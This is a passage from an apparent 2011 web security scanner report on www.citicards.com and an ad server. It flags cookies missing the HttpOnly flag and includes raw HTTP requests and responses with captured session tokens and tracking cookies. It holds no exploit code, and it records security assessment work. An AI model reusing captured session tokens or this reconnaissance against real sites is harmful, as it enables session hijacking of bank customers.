GET /cards/acq/displayECM.do?screenID=3000&flow=web&siteId=CB&sc=4T3VJTP13CJ5MDQ94VW&B=M&app=UNSOL&m=3CJ5MDQ94VW&langId=EN&locale=en_US&ECM_SHORTCUT=Y HTTP/1.1
Host: www.citicards.com
Connection: keep-alive
Referer: https://www.citicards.com/cards/acq/Apply.do?app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer_631529116&ProspectID=EAAA394779264223B1D9C404C9AA6734
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HSID4T3VJ3000=kTjaTGnJbsaejkJUEjjpcU; VISITOR=1308312791632; CARDS_LOCALE=en; HSID4T3ZJ3000=kffdVRWEuNJx2hojRrLECb; siteId=CB; Channel=CONSUMER_UNSOL; LangId=EN; DecisionMethod=02; ProspectID=36CEB96C744948E481109575676DCE63; JSESSIONID=0000nDeneI9o8pv-LTRpzUZaZtt:gtcardsrmi10crd; ACQHSIDKEY=HSID4T3ZJ3000; s_pers=%20gpv_p7%3DCitibank%2520Online%2520Consumer%2520Card%2520-%2520Enter%2520Information%7C1308314665510%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

10.13. https://www.citicards.com/cards/acq/genericcontent.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.citicards.com
Path:	/cards/acq/genericcontent.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=00000DM5z7hU6H2m2_QDhnareMb:gtcardsrmi10crd; Path=/; Secure
ACQHSIDKEY=HSID4DNZJ3000; Path=/; Domain=www.citicards.com; Secure

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cards/acq/genericcontent.do?content_id=content_onlineservices_popup HTTP/1.1
Host: www.citicards.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HSID4T3VJ3000=kTjaTGnJbsaejkJUEjjpcU; VISITOR=1308312791632; CARDS_LOCALE=en; HSID4T3ZJ3000=kffdVRWEuNJx2hojRrLECb; siteId=CB; Channel=CONSUMER_UNSOL; LangId=EN; DecisionMethod=02; ProspectID=36CEB96C744948E481109575676DCE63; ACQHSIDKEY=HSID4T3ZJ3000; JSESSIONID=0000nDeneI9o8pv-LTRpzUZaZtt:gtcardsrmi10crd; s_pers=%20gpv_p7%3DCitibank%2520Online%2520Consumer%2520Card%2520-%2520Enter%2520Information%7C1308314614821%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3Dcitinaprod%253D%252526pid%25253DCitibank%25252520Online%25252520Consumer%25252520Card%25252520-%25252520Enter%25252520Information%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.citicards.com%2525252Fcards%2525252Facq%2525252Facq%2525252Fimg%2525252Fapply%2525252Fbtn_VerifyApp.gif%252526ot%25253DIMAGE%3B

Response

HTTP/1.1 200 OK
Server: ""
Date: Fri, 17 Jun 2011 12:16:42 GMT
Content-type: text/html; charset=ISO-8859-1
X-ua-compatible: IE=EmulateIE7
X-ua-compatible: IE=EmulateIE7
Cache-control: no-cache
Pragma: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: private
Cache-control: no-store
Cache-control: max-stale=0
Cache-control: must-revalidate
Cache-control: max-age=0
Cache-control: proxy-revalidate
Cache-control: s-max-age=0
Content-language: en-US
Set-cookie: JSESSIONID=00000DM5z7hU6H2m2_QDhnareMb:gtcardsrmi10crd; Path=/; Secure
Set-cookie: ACQHSIDKEY=HSID4DNZJ3000; Path=/; Domain=www.citicards.com; Secure
Vary: accept-encoding
Content-Length: 15495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

...[SNIP]...

10.14. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!%!!!!?J!!!!)='htq!!(1-!!!!-=(6NF!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!-=(6NF!!/GR!!!!-=(6NF!!/Ju!!!!$='htq!!/K$!!!!(=(6NF!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!(=(6NF!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!.=(6NF!!J<K!!!!.=(6NF!!J<O!!!!,=(6NF!!J<S!!!!.=(6NF!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!+=(5yj!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!.=(6NF!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!#=(C+#!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!,=(6NF!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!,=(6NF!#MTF!!!!'=%=]S!#MTH!!!!.=(6NF!#MTI!!!!.=(6NF!#MTJ!!!!.=(6NF!#Nyi!!!!#=!eq^!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!$=(6NF!#UDQ!!!!.=(6NF!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7!!!!!#=(:!J!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!$=(6NF!#]Uq!!!!$=(6NF!#]Uy!!!!$=(6NF!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!#=(6NF!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!'=(6NF!#`-[!!!!'=(6NF!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!#=(6NF!#b86!!!!#=(6NF!#b87!!!!#=(6NF!#b8:!!!!#=(6NF!#b8F!!!!#=(6NF!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!#=(6NF!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!#=(6NF!#g)O!!!!#=(6NF!#h.N!!!!#=#M8b!#mP$!!!!%=(C6j!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q+A!!!!$=(6NF!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#s`D!!!!#=(BU+!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#slj!!!!#=#T_f!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!$=(6NF!#wUS!!!!,=(6V[!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!$=(6NF!$#X4!!!!#=#%VO!$#yu!!!!,=(6NF!$$I]!!!!#=(6NF!$$Ig!!!!#=(6NF!$$Il!!!!#=(6NF!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'/S!!!!#=#mS:!$(:q!!!!#=$Fss!$(Gt!!!!(=(6NF!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$._W!!!!#='i+,!$/F4!!!!#=(1C-!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y!!!!#=(6?g!$35v!!!!#=(BU="; path=/; expires=Sun, 16-Jun-2013 11:58:29 GMT
BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?adv=60652&code=AS6956&t=2&rnd=1298276706 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2939?ret=html&phint=keywords%3DPoints%20Rewards%20Credit%20Cards%2C%20credit%20card%2C%20reward%20credit%20cards%2C%20credit%20card%2C%20Credit%20Cards%2C%20cash%20back&phint=__bk_t%3DPoints%20Rewards%20Credit%20Cards%20-%20CreditCards.com&phint=__bk_k%3DPoints%20Rewards%20Credit%20Cards%2C%20credit%20card%2C%20reward%20credit%20cards%2C%20credit%20card%2C%20Credit%20Cards%2C%20cash%20back&limit=4&r=50781410
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; pv1="b!!!!'!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN!#Jl?!$5*F!$uj6!.#:D!%^Pa!!!!$!?5%!$8Ip,!@Dj0!'jh]~~~~~~~='htp=(g[2!!!([!$'!_!$5*F!%1#4!1W4@!%uAQ!!!!$!?5%!*)IX>!?Q8(!(1br~~~~~~~=(1IO=*.n+!!!(["; ih="b!!!!P!'4@g!!!!#=$KA3!)AU6!!!!#='htn!)AU7!!!!#=(1IK!-5BI!!!!$=$J^*!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.#:D!!!!#='htp!.`.U!!!!#='htS!/'y^!!!!#=(1IG!/JVV!!!!'='jNd!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1W4@!!!!#=(1IO!1e75!!!!#=%3V6!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2L<B!!!!#=(1ID!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2!2`+,!!!!#='hw!!2gH2!!!!#='i#o"; bh="b!!!%!!!!?J!!!!)='htq!!(1-!!!!-=(6NF!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!-=(6NF!!/GR!!!!-=(6NF!!/Ju!!!!$='htq!!/K$!!!!(=(6NF!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!(=(6NF!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!.=(6NF!!J<K!!!!.=(6NF!!J<O!!!!,=(6NF!!J<S!!!!.=(6NF!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!+=(5yj!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!.=(6NF!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!#=(C+#!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!,=(6NF!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!,=(6NF!#MTF!!!!'=%=]S!#MTH!!!!.=(6NF!#MTI!!!!.=(6NF!#MTJ!!!!.=(6NF!#Nyi!!!!#=!eq^!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!$=(6NF!#UDQ!!!!.=(6NF!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7!!!!!#=(:!J!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!$=(6NF!#]Uq!!!!$=(6NF!#]Uy!!!!$=(6NF!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!#=(6NF!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!'=(6NF!#`-[!!!!'=(6NF!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!#=(6NF!#b86!!!!#=(6NF!#b87!!!!#=(6NF!#b8:!!!!#=(6NF!#b8F!!!!#=(6NF!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!#=(6NF!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!#=(6NF!#g)O!!!!#=(6NF!#h.N!!!!#=#M8b!#mP$!!!!#=(C1>!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q+A!!!!$=(6NF!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#s`D!!!!#=(BU+!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#slj!!!!#=#T_f!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!$=(6NF!#wUS!!!!,=(6V[!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!$=(6NF!$#X4!!!!#=#%VO!$#yu!!!!,=(6NF!$$I]!!!!#=(6NF!$$Ig!!!!#=(6NF!$$Il!!!!#=(6NF!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'/S!!!!#=#mS:!$(:q!!!!#=$Fss!$(Gt!!!!(=(6NF!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$._W!!!!#='i+,!$/F4!!!!#=(1C-!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y!!!!#=(6?g!$35v!!!!#=(BU="; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:29 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%!!!!?J!!!!)='htq!!(1-!!!!-=(6NF!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!-=(6NF!!/GR!!!!-=(6NF!!/Ju!!!!$='htq!!/K$!!!!(=(6NF!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!(=(6NF!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!.=(6NF!!J<K!!!!.=(6NF!!J<O!!!!,=(6NF!!J<S!!!!.=(6NF!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!+=(5yj!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!.=(6NF!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!#=(C+#!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!,=(6NF!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!,=(6NF!#MTF!!!!'=%=]S!#MTH!!!!.=(6NF!#MTI!!!!.=(6NF!#MTJ!!!!.=(6NF!#Nyi!!!!#=!eq^!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!$=(6NF!#UDQ!!!!.=(6NF!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7!!!!!#=(:!J!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!$=(6NF!#]Uq!!!!$=(6NF!#]Uy!!!!$=(6NF!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!#=(6NF!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!'=(6NF!#`-[!!!!'=(6NF!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!#=(6NF!#b86!!!!#=(6NF!#b87!!!!#=(6NF!#b8:!!!!#=(6NF!#b8F!!!!#=(6NF!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!#=(6NF!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!#=(6NF!#g)O!!!!#=(6NF!#h.N!!!!#=#M8b!#mP$!!!!%=(C6j!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q+A!!!!$=(6NF!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!